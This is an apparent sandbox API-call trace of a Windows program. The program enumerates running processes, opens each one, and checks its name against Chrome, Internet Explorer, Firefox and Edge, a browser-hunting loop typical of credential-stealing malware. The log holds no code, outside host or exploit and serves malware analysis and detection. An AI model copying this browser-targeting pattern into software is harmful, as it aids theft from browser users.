	[0242.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.409] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8908
	[0242.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.410] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.411] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.411] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.411] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0242.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x890c
	[0242.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.412] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0242.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.413] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.413] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0242.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.413] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.414] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0242.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8910
	[0242.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.415] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0242.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.415] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.415] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0242.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.415] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.416] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0242.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8914
	[0242.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.417] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0242.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.417] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.417] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0242.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.418] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.418] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0242.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8918
	[0242.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.419] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0242.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.419] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.419] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0242.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.420] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0242.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x891c
	[0242.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.421] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0242.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.421] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.422] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0242.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.422] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0242.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8920
	[0242.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.423] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.423] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.423] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.424] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.424] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8924
	[0242.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.425] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.425] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.426] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.426] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8928
	[0242.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.427] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.428] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.428] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.428] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x892c
	[0242.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.429] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.430] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.430] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.430] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.431] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8930
	[0242.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.431] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.432] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.432] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.432] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8934
	[0242.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.434] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.434] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.434] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.435] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8938
	[0242.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.436] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.436] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.436] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.437] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x893c
	[0242.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.438] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.438] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.439] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.439] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.439] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0242.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8940
	[0242.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.440] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0242.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.441] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.441] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0242.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.441] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.441] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8944
	[0242.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.442] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.443] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.443] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.443] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0242.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8948
	[0242.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.445] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.445] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.445] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.445] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.446] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x894c
	[0242.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.448] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.448] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8950
	[0242.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.449] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.449] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.450] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8954
	[0242.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.451] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.451] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.451] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.452] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0242.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8958
	[0242.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.453] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0242.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.453] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.454] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0242.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.454] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.454] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0242.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x895c
	[0242.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.455] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.455] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.456] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.456] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.456] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0242.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8960
	[0242.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.457] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0242.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.457] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.458] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0242.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.458] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.458] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0242.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0242.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0242.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8964
	[0242.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.460] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0242.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.461] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.461] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0242.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.462] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
